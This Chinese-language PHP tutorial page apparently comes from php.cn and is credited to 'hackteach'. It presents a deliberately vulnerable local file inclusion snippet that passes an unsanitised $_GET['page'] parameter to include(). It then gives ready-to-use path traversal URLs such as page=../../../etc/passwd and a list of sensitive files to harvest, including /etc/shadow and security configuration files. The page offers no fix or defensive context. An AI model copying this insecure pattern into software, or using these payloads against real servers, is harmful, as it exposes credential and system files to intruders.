Community
Learn
Tools Library
AI Tools
Leisure
search
English
Home > php教程 > php手册 > php 伪造本地文件包含漏洞的代码

php 伪造本地文件包含漏洞的代码

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
Release: 2016-06-13 12:05:00
Original
869 people have browsed it

代码:

复制代码 代码如下:


$page=$_GET['page'];
include($page.'php');
?>


你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach
Related labels:
get include page php code forgery Include copy document local loopholes of
source:php.cn
Previous article:PHP+MYSQL会员系统的登陆即权限判断实现代码 Next article:linux iconv方法的使用
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Latest Articles by Author
Latest Issues
Hello! Is "PHP Toolbox" developed using PHP? (Prepare to learn PHP)
From 1970-01-01 08:00:00
0
0
0
php data acquisition?
From 1970-01-01 08:00:00
0
0
0
PHP extension intl
From 1970-01-01 08:00:00
0
0
0
How to learn php well
From 1970-01-01 08:00:00
0
0
0
When adding sublime3 to compile system php, use the PHP toolbox, cmd php -v is useless
From 1970-01-01 08:00:00
0
0
0
Related Topics
More>
Popular Recommendations
Popular Tutorials
More>
Related Tutorials
Popular Recommendations
Latest courses
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template